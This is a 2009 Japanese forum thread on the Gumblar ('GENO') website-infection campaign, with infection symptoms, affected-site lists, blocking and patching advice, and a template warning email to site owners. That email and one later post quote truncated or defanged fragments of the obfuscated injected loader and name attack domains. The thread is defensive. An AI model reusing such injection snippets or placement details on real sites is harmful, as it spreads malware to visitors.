ブラウザのキャッシュを消すことに害はありませんが、感染前後の対処・予防には一切関係ありません。
777192.168.0.774:2009/05/18(月) 09:44:30 ID:7S654oYT0
キャッシュを消せってのは履歴を消させようとしたって事?
778192.168.0.774:2009/05/18(月) 09:45:11 ID:v6qQswXM0
>>774
私の意見だが、個人サイトならサイトタイトルそのままは避けた方が良いかも
企業サイトとか既に感染真っ黒で有名なところならまだしも
サイト名検索した人が、検索でうっかりリンク集に辿り着いちゃう可能性もあるし
779778:2009/05/18(月) 09:49:08 ID:v6qQswXM0
すまん、焦って途中送信してしまった
これじゃ思い切り矛盾してるw
散々既出の有名どころなら検体鑑定してくれる人にも解るように書いた方が良いかなと最初は思ったんだが
一般のお客さんとかが企業名で検索して辿り着くケースもあるから、企業サイトも伏せ字とかにした方がいいかな
780192.168.0.774:2009/05/18(月) 09:49:10 ID:q3s4agtr0
正直同人板は精神的に子供の集まりです。多少の基地外ぶりは勘弁してやって欲しい。

ケットコム という同人イベントの案内サイトがある
そこの[過去]で最近終了したイベントのジャンルを見る(特定ジャンル系ならなお良)
イベントサイトへのリンクを辿ればその中に参加サークルのリストがあったりする
イベントに参加したばかりのサイトは同人誌在庫情報や日記等を始め少なからず更新作業があったりする
感染サイト捜索法のひとつとして有効かもしれないです。
781192.168.0.774:2009/05/18(月) 09:49:17 ID:ZOxYxVRDO
前レスに出てたが検体を探すなら夢、夢絵、名前変換を掲げるところがいいと思う
確か夢マナー夢絵マナーのサイトが感染してたと聞いたのでより可能性が高い
また夢と通常二次を兼用しているところもあるから倍率ドン
782192.168.0.774:2009/05/18(月) 09:49:43 ID:yKeLT0rF0
>>772他同人板から来た人
来ました宣言とか挨拶みたいな雑談参加はいらんよ。
雑談は同人板のでもうお腹いっぱいです。

>>778
レスd。だが考えてみれば他に登録する人と重複しちゃなんだし
サイト名を一部だけ伏字で登録してみた。
783192.168.0.774:2009/05/18(月) 09:50:48 ID:GfBjvcuO0
>>774
固有サイト名でおk
URLはhttp://抜いてコメントかどっかにどうぞ
ある程度溜まったらまとめて解析なり提出なりしてもいいし
784192.168.0.774:2009/05/18(月) 09:51:33 ID:4ySopLDi0
>>776  回答ありがとうです。つまりGENOが証拠隠滅?を謀ったからなのでしょうか。
キャッシュ消す事でGENOがウイルスに感染した事が証拠隠滅になるのかわかりませんが・・・
785192.168.0.774:2009/05/18(月) 09:51:57 ID:c4TnzPSv0
>>764
ってかね、自分の目から見た分には
真面目に意見してた人は
ただ晒せ晒せなんて言ってないし、相当丁寧に説明してたと思うよ。

自分も参加しようと思ってたが、連投規制くらってるうちに
それがほとんど荒らしやら釣り認定されて
正直もういいやって気分になった。

今も頑張って説明してる人はいるけど
まだ「スルー検定」とか言われてるしね。
あれじゃ見限られても仕方ない。
786192.168.0.774:2009/05/18(月) 09:52:21 ID:tFgIi2z+0
自分が最初に登録しておいてアレだけど
「黒」って表現はいまいち宜しくない気がした
もっと良い表現は無いもんかな
787192.168.0.774:2009/05/18(月) 09:52:52 ID:0DpAySJK0
今北。ちょっと聞きたいんだが、cmd.exeの起動確認ってしても大丈夫なのか?
ダメって言うの見りゃ大丈夫っていうのもあってもう何が何だか
788192.168.0.774:2009/05/18(月) 09:53:02 ID:EUa+NIiOO
ジャンルヲチスレにスレ住人にはわかる形で具体的な感染サイトのヒントが出ていた
あいにくサイト名覚えてないし携帯だから確認できないが
789192.168.0.774:2009/05/18(月) 09:54:45 ID:yKeLT0rF0
>>784
適当な回答で誤魔化したんだよ
証拠隠滅と言うかうやむやにしようとしたの

黒は確かに黒だから放り込んでるんだしな。ふむ
自分が登録した分ちょっと弄ってくる
790192.168.0.774:2009/05/18(月) 09:59:39 ID:yKeLT0rF0
チェッカで1000%は確定で良いのかな?
アバスト反応しなかったから未確認の方が良い?

良く考えたらhostsでドメイン弾いていたはずなんだけど
もう一個の方でアバストが反応したのはなんでだ?
新しいドメインとったのだろうか? わかる人いたらちょっと頼む
791192.168.0.774:2009/05/18(月) 10:02:34 ID:TTbAOLbH0
試しにmixiの日記で告知してみたら普通の人は誰も知らないみたいで戦慄モノだった
企業とか狙われてるんだし、もう知ってる奴はできる限り一般に広めたほうがいいんじゃね
もし仮に単位確認時期の大学HPとか改ざんされたら大混乱なんてもんじゃねーぞ
まず普通の人間は「あっぷでいと?なにそれ新しいソフト?」って感じなんだから、いやマジで
792192.168.0.774:2009/05/18(月) 10:02:46 ID:duvNIOfD0
>>520
PG2導入したら、そこもIPブロックされているな
ネット巡回がしにくくて困る・・・・
793192.168.0.774:2009/05/18(月) 10:02:48 ID:yKeLT0rF0
>>789
ごめん自己解決した
ただの仕込まれてたHTMLファイルでもうトロイ扱いだっただけだった
俺はずかしー
794192.168.0.774:2009/05/18(月) 10:03:40 ID:BKfPdn6O0
感染サイト開くとcookieに
miek
1
www.abcdefg.com/ランダムな文字列
*
みたいなの保存されてどこのサイトで感染したか判る
795192.168.0.774:2009/05/18(月) 10:04:17 ID:xKiO8GiH0
住人のみんなおはやう

GENOウィルス対応済ませて疲れて夕方横になったら朝だったよー
一応対策してるスレと感染済み検体リスト貼っとくねん
http://pc11.2ch.net/test/read.cgi/internet/1242450264/
http://genolists.alink.uic.to/

検体協力出来る人居たらしてあげてちょ
同人板のスレは対処は出来ても検体協力頼んだら荒らし認定されちゃうから
対処に関してははこの2個見てちょ

http://www40.atwiki.jp/gegegeno/
http://www31.atwiki.jp/doujin_vinfo/

同人サイトから一般サイトへの広がりもやばくなってきたみたいだから一応貼っとく
新型インフルも大変だけど、ねらー的にはこっちも大変だよな
796192.168.0.774:2009/05/18(月) 10:04:18 ID:yKeLT0rF0
更に安価もミスってるし。しばらくサイト探しだけしてROMってるわ
797192.168.0.774:2009/05/18(月) 10:06:04 ID:xKiO8GiH0
>>795は誤爆
ごめんなさい(;つД`)
798192.168.0.774:2009/05/18(月) 10:07:49 ID:GfBjvcuO0
じわじわリストも上がってるな、協力感謝
799192.168.0.774:2009/05/18(月) 10:14:07 ID:Uvd5wKih0
>>786
GENO
NON GENO

とか
800192.168.0.774:2009/05/18(月) 10:17:33 ID:ua7Ctj4Z0
>>775
>報道は何やってんだ。

多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
(2009/04/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857

多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
(2009/04/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856

薬事日報のサイトが改ざん〜閲覧者にウイルス感染のおそれ
(2009/04/22 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1864

正規サイト改ざん(3) ウイルスに感染しないための対策
(2009/04/24 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867

国内の正規サイト改ざん:攻撃サイトを変え再襲来
(2009/05/13 セキュリティ通信)
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884

2009年5月14日 10:49:00 AM
人気の夜遊びウェブサイトへアクセスした人の週末が台無しに
http://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html

新手のWebベースマルウェアが急拡大
正規のWebサイトに感染する新手のマルウェアが勢力を急拡大している。
[ITmedia]2009年05月15日 08時24分 更新
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

SophosLabs ブログ (英語)
Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks.
http://www.sophos.com/blogs/sophoslabs/v/post/4405
801192.168.0.774:2009/05/18(月) 10:18:34 ID:ua7Ctj4Z0
小林製薬の一部サイトが改ざん、閲覧者はウイルス感染の恐れ
[INTERNET Watch]2009/05/14 14:57
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html

小林製薬のサイトが改ざん被害、閲覧でウイルス感染の可能性
[Yahoo!ニュース]5月15日17時11分配信
http://headlines.yahoo.co.jp/hl?a=20090515-00000002-vgb-secu

Symantec
脅威レポートのタブ(Volume XIII ハイライト)
http://www.symantec.com/ja/jp/business/theme.jsp?themeid=threatreport
(概要としては今回の攻撃型の予測になっているような気がするので、ちょっとずれてるけど記載)


てきとーに漁ってこんなもんかな。
802192.168.0.774:2009/05/18(月) 10:20:34 ID:ihTs5Cw90
あれ?so-netってGENOにやられてるんじゃないっけ?気のせいだっけ
803192.168.0.774:2009/05/18(月) 10:20:40 ID:lNiEWqwt0
>>800
情報d、俺の調べが駄目駄目だったようだ、申し訳ない。
しかし、薬事日報までアウトだったとは・・・
804192.168.0.774:2009/05/18(月) 10:24:09 ID:k2CI1leb0
>>794
そのcookieチェックがないスクリプトもあるよ。
つか、gnomeの中の人が報告してるphp埋め込みのタイプのを収集してる
ところなんだけど、なかなか新しいバリエーションが見つからない。
805192.168.0.774:2009/05/18(月) 10:25:01 ID:gw0F+TVl0
Adobe Shockwave Playerってのも更新したほうがいいの?
ってかどうやってバージョン確認するんでしょうか?

xp pro sp2
806192.168.0.774:2009/05/18(月) 10:25:52 ID:cIdqirF80
命まで取られねえ
そのまま使え
807192.168.0.774:2009/05/18(月) 10:26:22 ID:iven4hyc0
>>800
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
808192.168.0.774:2009/05/18(月) 10:28:28 ID:n6Y+m8FmO
感染確認方法にあるタスクマネージャでの方法だけど
小文字と大文字とか関係ある?
見本は小文字なんだけど見たらうちのは大文字でSVCHOST.EXEだった
さらにsvchst.exeっつーのがあるんだが…
ひょっとしてアウト?
809192.168.0.774:2009/05/18(月) 10:28:41 ID:k2CI1leb0
>>805
ま、↓から最新をインストールしとけ。
http://www.adobe.com/jp/products/shockwaveplayer/
810192.168.0.774:2009/05/18(月) 10:31:33 ID:7k/9HGtp0 BE:660438427-2BP(0)
811192.168.0.774:2009/05/18(月) 10:31:52 ID:2hjuGSUk0
>>808
その二つのプロセス名でググってみろ
812192.168.0.774:2009/05/18(月) 10:35:45 ID:gw0F+TVl0
>>806
>>809
どっちなんだ・・・orz
813192.168.0.774:2009/05/18(月) 10:37:26 ID:cIdqirF80
>>812
更新してよ・・
814スパムのような警告メール:2009/05/18(月) 10:38:36 ID:ua7Ctj4Z0
Webサイト製作 ご担当者さま

■ お願い

御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。

状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。



この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。

同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。
感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)感染を広げるための
スクリプトの埋め込みを行なうようです。

他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。
HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と
なっております。

■ 確認した感染ページ

<多分、全てのページが感染中>

 ●HTMLファイルの場合
  <body>タグの直前に難読化されたコードが埋め込まれる。
  (例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず
   危険コードが埋めこまれないようです)
 ●PHPの場合
  ファイルの最初に難読化されたコードが埋め込まれる。
 ●JSの場合
  ファイルの最後に難読化されたコードが埋め込まれる。
 その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
815スパムのような警告メール:2009/05/18(月) 10:39:31 ID:ua7Ctj4Z0
■感染していると思われるページの危険部分

(これは一例です。複数のバリエーションがありますので、同じ文字列とは限りません)

|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>

■ 感染していると思われるウイルスの情報

HP更新に使用したPCが感染していると思われるマルウェア(コンピュータウイルス)は
新種の為、正式名称が定まっておらず、GENO(ZLKON)ウイルス/gumblar.cn/martuz.cn などと
呼ばれているものと思われます。下記のサイトの情報をご参照ください。

まとめサイト
  http://www29.atwiki.jp/geno/

各社の告知
 So-NET セキュリティ通信
  多数サイトが改ざん(1) PC通販「GENO」など閲覧者にウイルス感染のおそれ
   http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1857
  多数サイトが改ざん(2) 狙われた「Adobe Reader」と「Adobe Flash Player」
   http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1856
  正規サイト改ざん(3) ウイルスに感染しないための対策
   http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1867
  国内の正規サイト改ざん:攻撃サイトを変え再襲来
   http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
 [ITmedia]新手のWebベースマルウェアが急拡大
  http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

専門的な解説等
  http://ilion.blog.shinobi.jp/Entry/85/
  http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=gumblar%2Ecn+%A4%AB%A4%E9+martuz%2Ecn+%A4%D8
  http://www3.atword.jp/gnome/

このマルウェアに感染したPCで、FTP接続しファイルを更新することでhtmlやphp、js
といったファイルが書き換えられて現在の状況になっているものと思われます。
816192.168.0.774:2009/05/18(月) 10:40:03 ID:k2CI1leb0
>>812
最新にしておいて害はない。
817スパムのような警告メール:2009/05/18(月) 10:40:44 ID:ua7Ctj4Z0
■ 解決方法について

駆除方法
http://www29.atwiki.jp/geno/pages/14.html

一度感染してしまうと、PC稼動状態で除去するのは困難…というより、無理です。
必要なデータをバックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にするしかありません。

1.Webサイトにある「ファイルを一旦全て削除し」被害の拡大を阻止
  隠れた所に残存する可能性があるのですべてのファイルを削除してください
  この段階では、告知を上げても、告知自体に危険コードが入りますので
  まずは削除だけをお願いします。

2.各種データのバックアップ(IDとかパスワードのメモやブックマークも忘れず)

3.OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
  セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
  インストールや、バックアップしたデータの書き戻しを行なってください。

4.HP更新に使用するftpパスワードの変更
  (以前のものは盗まれており外部から悪用される可能性があります)

5.Webサイトに危険コードを含まないファイルをアップロードしなおす。

6.感染が行われる状態であった日時の告知とサイト訪問者に対するお詫び、及び
  解決策の紹介(PCリカバリ/OS再インストールしかない訳ですが)。

  正直かつ正確に書くことで訪問者からの信用回復を行なってください。
  最初にこのウイルスが確認された、某通販サイトのように、危険な状態であったことを
  隠蔽したり、ブラウザのキャッシュを消せばOKといった嘘情報を書くことで、被害を
  拡大させるようなことだけは行なわないようにお願いいたします。

ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。

感染PCはゾンビ化して、ボットネットに組込まれるという情報もありますが
正確なことはわかっていません。

■再発防止策

・WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデート
・既知の危険サイト(今回の場合は、http://www3.atword.jp/gnome/の焼却リスト参照)を
 ブロックするよう、セキュリティソフトのFWを適切に設定したり、
 PG2といったソフトのIPブロックで感染を回避する。

  焼却リスト:http://www3.atword.jp/gnome/2000/01/13/block-list/

 感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
 再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
818192.168.0.774:2009/05/18(月) 10:41:01 ID:gw0F+TVl0
>>813
>>816
うん・・・更新してくる
819スパムのような警告メール:2009/05/18(月) 10:42:24 ID:ua7Ctj4Z0
■私見による蛇足

幾つかのサイトの告知ページ等では、セキュリティソフトベンダーを紹介しておりますが、
実際に稼動する本体は、ほとんど日替わりのように入れ替えられている為に、紹介されている
セキュリティソフトにて「除去が行なえるとは言い切れません」。(というか多分無理です)

実際の動作を解析された方の報告によると、一定時間毎に自己を複製して古いものを
自己消滅させて捕捉を困難にする挙動のようですし、現時点では、感染後に元の環境に
戻すことのできるセキュリティソフトは確認できていません。

また、感染ファイルの除去を行なっても、ランダムな文字列でWindowsのレジストリ等を
変更してしまっているなど、原状復帰には至りません。閲覧者向けに告知される場合は、
セキュリティソフトベンダーのを紹介するよりも、PCのリカバリを推奨するのが
良いのではないかと思われます。


以上、要件のみにて失礼致します。
820スパムのような警告メール:2009/05/18(月) 10:44:28 ID:ua7Ctj4Z0
(サイト管理者ではなく、レンタルサーバーなどのドメインの管理者宛の場合、下記を頭につける)

ご担当者さま

御社管理下のIP「〜」に開設されているホームページ
http://〜」において、閲覧者のPCに第三者の
サーバーからマルウェア(コンピュータウイルス)をダウンロードさせる
攻撃スクリプトが挿入されていることを確認しました。

該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
連絡先のメールアドレスを見付けることができませんでした。
管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。


閲覧するだけで感染する形で被害が広がっており、他の御社顧客の中にも
同様の危険を放置しているケースがあるかもしれません。そちらも併せて
ご確認いただければと思います。

攻撃スクリプトは、Avast!のJS:Redirector-H〜JS:Redirector-H9、
SophosのTroj/JSRedir-Rという名称で検出可能なようですので、
御社顧客のサイトを一通りチェックして頂けると有難いです。

他のセキュリティベンダーでは、危険ファイルをダウンロードする
第三者のサーバーIPをFWでのブロック対象にする形で対応している
ようですので、この攻撃スクリプトは検出されないようです。
−−−−−
>該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
>連絡先のメールアドレスを見付けることができませんでした。
>管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。

ここを、対応をお願いします…だけでもいいかも。
821192.168.0.774:2009/05/18(月) 10:45:47 ID:ua7Ctj4Z0
>>814-815,>>817,>>819-820

という訳で、ちょっと手直しして昨日使ったものです。

使いまわしされるならご自由に。
822192.168.0.774:2009/05/18(月) 10:46:11 ID:RopbQr7x0
同人の方でXP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の
環境で感染したって報告あったけど防ぎようがないじゃんもうこれ
823192.168.0.774:2009/05/18(月) 10:48:54 ID:yKeLT0rF0
361 :報告 :2009/05/18(月) 10:38:34 ID:Efl7GhePO

(略)

そして自分も只今クリーンインストール中
XP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の
環境で感染しました
ジャバスク切りに失敗してたのが原因かも知れません
アホすぐる

■sqlsodbc.chmサイズ変更確認
■cmd.exe、regedit.exeは起動した
■白紙のPDFファイルが一気に10個以上開いてCPU使用率\(^o^)/オワタ
■Windows Updateに接続できない

一応自分の環境ではこういう症状が出ました

(後略)


だってさ
824192.168.0.774:2009/05/18(月) 10:50:08 ID:EdkHVUmF0
>>822
その人はJavaScript無効になってなかったと言ってたような
825192.168.0.774:2009/05/18(月) 10:51:14 ID:gM07vQcn0
誰かPV数の多いたれこみ可能サイトへ情報投稿したらどうだろう?
スラドとかITmediaとかGigazineとか。
826192.168.0.774:2009/05/18(月) 10:51:18 ID:ua7Ctj4Z0
>>822
SP2なところがダメダメな気がしますが

>Avast導入
スクリプトがすり抜けるケースも報告されており、過信はできません。
また、5/14に攻撃サイトのドメインが変更されており、すり抜けが増えている可能性があります。

>IP遮断済
最新の martuz.cn を遮断IPに加えていなかったか、設定が間違っていた可能性が高いです。

>Adobeリーダー・フラッシュプレイヤー最新
PDF、SWF以外にexeも落ちてくるんですが…exeの実行手法がわかりませんけど。
827192.168.0.774:2009/05/18(月) 10:52:47 ID:GfBjvcuO0
IP遮断してもって、文字通りだとしたら、どういうことよw

リスト全く増えねぇなwジャンル報告だかは普通にあるのにな
828192.168.0.774:2009/05/18(月) 10:52:47 ID:lNiEWqwt0
>>823
が本当なら、テキはAdobeの脆弱性で未公表のものをいくつかストックしている可能性があるってことか。
新規脆弱性の波状ゼロデイ攻撃でGENOウイルスを散布されたらシャレにならん。

ひょっとしたらpdfが開くのだって「まだAdobeの脆弱性をつかってますよー」ってう偽装で、本当は
他の脆弱性を使ってるかもしれないし。

なんてことだ
829192.168.0.774:2009/05/18(月) 10:54:31 ID:yKeLT0rF0
>>826
やっぱexeに引っかかったってことかー
exeを実行させるってことはJS必須?JSオフで画像でも可?
あんまりスキル無いから感染サイト捜索打ち切った方が良いかな。

数個しか見つけれなんだ。役に立たなくてすまん。皆は頑張ってくれ
830192.168.0.774:2009/05/18(月) 10:54:51 ID:JmCcr4Q60
>>823
Avast導入 → 何時導入?定義更新は自動任せ?
IP遮断済 → 何時導入?
Adobeリーダー・フラッシュプレイヤー最新 → 何時更新?

この辺が判らんと感染してから更新or対策した可能性が否定できんのでなんとも。
相手さん改良続いてるから他の脆弱性突いてきてる可能性も否定できんし、こりゃ困ったもんだのう…
831192.168.0.774:2009/05/18(月) 10:54:53 ID:BZxCgznZ0
【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/
832192.168.0.774:2009/05/18(月) 10:55:47 ID:Wk6IzuQl0
あくまでも未確認情報だから確定事項みたいに書かないように気をつけろよ。
と他の板から見に来てる人に書いておく。
833192.168.0.774:2009/05/18(月) 10:56:23 ID:k2CI1leb0
>>828
スクリプトのID全部落ちてこないことも多いから、Adobe以外の脆弱性を
突いてる可能性は十分あるよな。
834192.168.0.774:2009/05/18(月) 10:56:34 ID:+m52NSIq0
GENOウイルス注意喚起の記事書いたらいつもの10倍のアクセスになった件
そんなつもりで書いたわけじゃないのに
835192.168.0.774:2009/05/18(月) 10:56:36 ID:iven4hyc0

197 名前: スイセン(dion軍)[sage] 投稿日:2009/05/18(月) 10:14:34.01 ID:sn4Pmcsx
ちょっと聞いてくれ

当方、評価用にWindows7(not Virtual XP)を運用しているんだが
試しに当該感染URLを踏んでみたら全然無害でした。
無害どころか、AppLockerとBitLockerのおかげでプロセスに乗せないよう
遮断してくれました。

ただし、これも評価用で入れたNorton 360 3.0 Betaは無反応でしたw
836192.168.0.774:2009/05/18(月) 10:59:01 ID:k2CI1leb0
>>829
画像&MIME改変のケースもあるよ。IEでは8未満は画像ファイルを
実行しちゃうっぽい。
837192.168.0.774:2009/05/18(月) 11:00:21 ID:ua7Ctj4Z0
>>835
だから、「現時点では」 Windows2000/XP以外のOSはバージョンチェックではねてるんだってば。
838192.168.0.774:2009/05/18(月) 11:01:21 ID:zpCoVVcL0
リストに同人サーチ上げた人、リンク繋がってるよ
839192.168.0.774:2009/05/18(月) 11:02:12 ID:n6Y+m8FmO
>>810-811
ありがとう

…別のウィルスに感染してんのか…
svchst.exeとか一文字違いなのが紛らわしい
しかもユーザー名出てて一瞬イきかけた
840192.168.0.774:2009/05/18(月) 11:02:48 ID:ua7Ctj4Z0
>>836
 ・IEを使う場合は下記を設定
  ・信頼できるSite以外ではスクリプトやActiveXを切る
   :インターネットオプションのセキュリティの部分で設定可能
  ・偽装jpg対策(IE6SP2以降限定。IE6SP1以前では出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする
841192.168.0.774:2009/05/18(月) 11:11:48 ID:UHl6zS+i0
avastいれたんだが、なんか必要な設定とかある?
情弱ですまんお
842192.168.0.774:2009/05/18(月) 11:15:54 ID:9Pl8YtKN0
>>841
人それぞれ環境が違うから何ともいえない
↓を読んでみるといいと思うよ
http://www.iso-g.com/
843192.168.0.774:2009/05/18(月) 11:20:01 ID:yKeLT0rF0
思いついたんだけど、検体集め&レポーターさん達で
自力で検体作成ってのは無理なんかね?

適当にFTPで非公開サイト作ってワザと感染すれば
色んな検体が集めれるんじゃとか思ったんだけど。ダメ?
844192.168.0.774:2009/05/18(月) 11:23:00 ID:B1//bRJ30
>>838
すいません、まちがえました。
こちらで削除できないので管理人さまお手数お掛けしますが
削除お願いいたします。
845192.168.0.774:2009/05/18(月) 11:23:10 ID:kA5lVKLe0
>>805
Adobe Shockwave と Flash Playerのテスト
http://www.adobe.com/jp/shockwave/welcome/
846192.168.0.774:2009/05/18(月) 11:23:39 ID:eM8L/6820
おはヨーグルト

烏骨鶏はまだ放置だな
847192.168.0.774:2009/05/18(月) 11:24:25 ID:ua7Ctj4Z0
そだ、>>1

>・再起動時にBSOD

踏んでもならなかったなーと思ってたんだが、(すぐにOS入れなおしたけど)
www3.atword.jp/gnome/の中の人の実験によると、再起動時に、IP遮断していると発生するとのこと。

>あと、 BSoD になる理由が判明
>ユーザ認証直後に 95.129.145.57 へ何らかのアクセスに失敗すると・・・?
>強引に explorer.exeをクラッシュさせてる様子

>これってアレだ・・
> 下手にIPブロックすると起動できなくなる・・
> 起動するためには IP情報、その他を抜かれるという・・・

>どこまでいやらしいんだオマエハ・・・・
848192.168.0.774:2009/05/18(月) 11:26:08 ID:k2CI1leb0
>>843
それが駄目なんだな。
IP変えつつアクセスしないといけないし、どうもサイトごと?に
バラまくものの傾向があって、同じものばかり落ちてくる。
ほぼ同時刻に別サイトで拾うと別のものが落ちてくる。
ドメイン名かIPアドレスかなんかをキーに送り込むファイルを
自動生成してるのかもしれない。
849192.168.0.774:2009/05/18(月) 11:26:50 ID:uJCPKem80
>>837
え、じゃあWin9x系には無害なの?
850192.168.0.774:2009/05/18(月) 11:26:56 ID:xKiO8GiH0
>>841
同人板からですまないが

389 GENO ◆AbjB8MStDM sage New! 2009/05/18(月) 11:00:57 ID:4tM/xy9HO
>>1

報告ってか提案なんだけど、あばすと使いとかでFW入れてない人用に
フリーのFWの紹介載っけてみたらどうだろう
やりすぎかな?

とりあえず自分はコモドのFW導入したので、コモドのまとめWikiどうぞ

http://www4.atwiki.jp/comodopf/


自分もavast使いだから入れてみたよ
今の所軽くて快適
851192.168.0.774:2009/05/18(月) 11:29:21 ID:Sh8lpjBX0
>>307
うちもよく同じ症状になる(JAVA無効)
852192.168.0.774:2009/05/18(月) 11:30:29 ID:yKeLT0rF0
>>848
なかなか手が込んでるね……

>>850
hostsでドメインで弾く派は少数なのか
853192.168.0.774:2009/05/18(月) 11:30:54 ID:+m52NSIq0
これを機にマジでNokia機を買おうかな
WM機がメインのネット端末だとかなり不安だ
854192.168.0.774:2009/05/18(月) 11:31:40 ID:k2CI1leb0
>>850
入れただけだとほぼ無意味だけど大丈夫?
Defense+で防御してくれる場合もあるけど、何も設定しないと
ばんばん通信を許可していくよ。
855192.168.0.774:2009/05/18(月) 11:33:46 ID:wsKEiiw60
ビビリな俺はnonscriptで全ページプラグイン禁止 リーダーはアンインスコ
一時的JS有効の時もフラッシュは切られてる状態
気休めかなあ 動画サイトはどうしようもないけど・・・
856192.168.0.774:2009/05/18(月) 11:36:01 ID:+m52NSIq0
もう同人板の連中なんてほっとけ!
なんて言ってられないからな・・・そこから広がると目も当てられないから。
857192.168.0.774:2009/05/18(月) 11:36:56 ID:DLMrt4rx0
>>852
俺やってる
気休めかなぁ
858192.168.0.774:2009/05/18(月) 11:37:22 ID:GfBjvcuO0
これが疫病とかなら言う事聞かなくても村を隔離する、で済むんだがなw
859192.168.0.774:2009/05/18(月) 11:38:56 ID:xKiO8GiH0
>>854
IPリストの人のブログ参照して片っ端からIP入れたよ
これでいいんだよね?
860192.168.0.774:2009/05/18(月) 11:41:54 ID:k2CI1leb0
>>859
とりあえずはOK。
ブロックするべきIP範囲もドメインもころころ変わるというか増えていく
可能性が高いけど。
861192.168.0.774:2009/05/18(月) 11:47:36 ID:+m52NSIq0
>>795
ブログでこの下のサイト2個にリンクしてもいいですか?
862192.168.0.774:2009/05/18(月) 11:48:07 ID:pOfdtuRP0
>>856
気分的にはほっときたいけどそうも言ってられんねw
同人板で「同人サイトなんてヒット数が少ないから影響も少ないはずなのに何故晒す必要があるの?」と言ってた人がいたけど
ヒット数が少なくてもねずみ算式で増えていくし、しかもその数が多いから対象を把握できないことにはどうしようもない
サイト管理者も低スキル、観閲者は更にひどい状況で対策が期待出来ないこともある
863192.168.0.774:2009/05/18(月) 11:49:55 ID:xKiO8GiH0
>>861
それ誤爆レスなんだけどなぁ(・ω・`;)
自分は自分のサイトとブログにリンクしたけど、特に問題は起こってないから
リンクしちゃっても大丈夫なんじゃないかな?
まぁ、自分の場合はねらーだってサイトでバレてるのもあるだろうけど
864192.168.0.774:2009/05/18(月) 11:51:28 ID:yKeLT0rF0
>>857
ナカーマ。気休めなのかなー。
IP増えてもドメインそのままなら有効だからお得
とか思ったんだが。

同人板の元になったノウハウ板のスレの方にリンク集貼られてた。
協力的とまでは言えないがそれでも同人以外で見つけた時とか
一応協力できそうな場合はリンク集に放り込んでくれるってさ。
貼った人の書き方もあるだろうけど向こうは穏やかだった。

感染しても活動的なとこならすぐ対処しちゃうわけでなかなか難しいんだな
865192.168.0.774:2009/05/18(月) 11:52:36 ID:J2AfAwvy0
(){e●val(unes●cape(('Sc●ript(t,'●%')))})(/./●g);
avast!ってこれに反応するのね
866192.168.0.774:2009/05/18(月) 11:55:17 ID:gw0F+TVl0
>>845
さっき更新して、そこで調べたらOKでした

ありがとう
867192.168.0.774:2009/05/18(月) 11:55:57 ID:+m52NSIq0
>>863
ありがとう。遠慮なくさせていただきます。
